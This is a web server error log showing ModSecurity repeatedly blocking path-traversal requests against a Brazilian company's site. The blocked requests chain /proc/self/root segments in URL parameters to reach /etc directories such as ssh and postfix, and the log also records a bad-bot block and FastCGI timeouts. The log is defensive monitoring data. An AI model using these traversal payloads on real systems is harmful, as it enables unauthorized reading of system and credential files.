[Wed Mar 18 15:47:14.222664 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:37934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzMgkwaGbbGflqUZBIxgAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:16.079205 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:37944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzNMdf6f5d65gmYZQLHwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:18.123319 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:50854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzNvu8EFLIOrSqIps2ZgAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:19.914453 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:50866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzN-yqAr6etmhZHNr_GgAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:27.647774 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:50880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzP-w_le52K8_3pV0RqAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:47:32.377925 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35740] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:47:54.131818 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36754] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:48:16.129781 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37658] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:48:23.396147 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:60486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzdymAPhZkrhU8w4mgVwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:48:28.179444 2026] [:error] [pid 17653:tid 140411548894976] [client 216.73.216.191:38768] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzfMdf6f5d65gmYZQLVQAAAtc"]
[Wed Mar 18 15:48:38.125836 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38604] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:48:39.088580 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:50506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzh0zinOy1jxa1j4dTdwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:48:52.731581 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.241.31:41180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzlMdf6f5d65gmYZQLegAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:48:57.262227 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:41400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrzmeoXxyEfFpUF8f-sKgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:49:00.146552 2026] [proxy_fcgi:error] [pid 29882:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39416] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:49:23.145797 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40136] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:49:26.157287 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:55590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrztuoXxyEfFpUF8f-sTAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:49:48.121791 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40864] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:49:53.324151 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.244.43:54470] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrz0ew_le52K8_3pV0R7wAAAhM"]
[Wed Mar 18 15:49:54.041654 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.228.61:47528] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrz0sdf6f5d65gmYZQLlAAAAso"]
[Wed Mar 18 15:50:13.133841 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41452] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:50:26.135016 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:48282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrz8ta6ubjKNq_cu4bT5gAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:50:41.963709 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:51606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0Aew_le52K8_3pV0SFAAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:50:46.045949 2026] [proxy_fcgi:error] [pid 11816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42170] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:50:47.445188 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:54596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0B8df6f5d65gmYZQLuAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:50:47.870236 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.243.128:42134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0BwbLMZ6AikZjR9X2EQAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:51:20.374263 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43046] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:51:49.129790 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43888] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:51:50.471608 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:50792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0RkzinOy1jxa1j4dT4gAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:52:16.062184 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44688] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:52:21.768741 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:41016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0Zcdf6f5d65gmYZQMJQAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:52:38.127594 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45338] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:53:00.134233 2026] [proxy_fcgi:error] [pid 29882:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46034] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:53:14.715454 2026] [:error] [pid 31803:tid 140411716749056] [client 216.73.216.191:55481] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0muyqAr6etmhZHNr_-AAAAEM"]
[Wed Mar 18 15:53:23.130246 2026] [proxy_fcgi:error] [pid 15051:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46666] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:53:47.125352 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47328] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 15:53:54.308436 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:54612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr0wvu8EFLIOrSqIps3SwAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
